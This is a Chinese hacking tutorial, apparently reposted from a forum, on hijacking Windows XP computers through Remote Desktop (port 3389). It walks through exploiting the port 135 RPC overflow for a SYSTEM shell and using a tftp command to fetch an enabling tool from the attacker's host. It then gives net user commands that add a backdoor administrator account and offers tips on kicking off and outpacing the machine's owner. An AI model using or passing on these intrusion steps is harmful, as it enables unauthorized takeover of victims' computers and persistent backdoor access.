今天我主要要为大家讲的是windows xp的Terminal Services服务。该服务使用的端口是tcp 3389端口。所以开Terminal Services服务的肉鸡大家就习惯管他叫3389鸡。想必大家都玩过win2k的3389吧?但是我最近去了一些论坛有很多人说windows xp的Terminal Services和windows 2000的是一样的。具我的多次实验发现windows xp的3389和windows 2000的3389根本不是一样的而且差的很多。下面我就为大家详细讲解一下windows xp的3389。首先要想清楚看见windows xp的3389就要先开启windows xp的3389。我在网上发现了一个针对开启windows xp3389的小工具。具我多次实验100%可以成功。该工具的名字为
xp3389.exe而且使用也非常简便。直接上传到肉鸡上执行就可以了。由于xp的ipc$默认只是guest权限。用ipc$的思路上传文件是绝对错误的。我归纳出上传文件的方法有两种:
1 利用tftp上传(tftp大家都很熟悉吧?以前提到过N次在这里我就不详细说了)
2 利用ftp来上传
首先我先用时下比较前卫的漏洞135端口的rpc漏洞溢出一台windows xp主机详细看下图:
OK。一举成功。拿到了一个system权限的shell.然后用tftp上传xp3389.exe命令为tftp –I ip get xp3389.exe看下图:
OK上传完毕。然后直接在肉鸡执行就可以了。看下图:
执行完毕以后就成功开启了3389服务。(该程序最大的好处就是执行以后不需要肉鸡重新启动就可以直接登陆。)
对了还有一个问题我要先象大家交代要想登陆xp的3389必须要使用系统没占用的帐号。也就是现在没有正被使用的帐号权限必须还需要是administrators组的。
Guest组是不可以的。我在肉鸡又执行了两条命令分别是:
Net user zihuan ziHUAN /add
Net localgroup administrators zihuan /add
相信大家都能看懂我在肉鸡上建立了一个管理员权限的用户为:zihuan密码为:ziHUAN。
建立好以后直接用远程桌面连接登陆看下图:
然后输入刚才建立的用户和密码登陆看下图:
OK一个完美的xp桌面。是不是非常爽啊?不过你先别高兴。我说了xp的3389和win2k的不一样。不一样的地方有几下几点:
1 你登陆上xp的3389以后该主机原来正在登陆的帐号会自动注销,也就是说xp只支持一个用户登陆。你登陆上去以后漏洞主机的主人就会掉下来:)如果肉鸡的主人发现他掉了下来在登陆的话你就会掉下来:)
2 在你登陆上xp3389肉鸡的主人会收到一条信息。但是如果你动作足够快的话……嘿嘿。
3 登陆上xp3389会把远程的主机的声音带到本地。你可不要害怕哦。解决的办法是把远程桌面连接的远程计算机声音选到留在远程主机看下图:
以上就是针对xp3389的一些思路。希望对光大黑迷以后hacking的时候能有所帮助。根据我测试还发现xp3389.exe还可以开启windows server 2003的3389由于篇幅原因我在这里就不给大家多介绍了。
xp3389.exe可以开启xp的终端。
传到肉鸡上直接运行即可。不需要重新启动。
欢迎分享,转载请注明来源:夏雨云
评论列表(0条)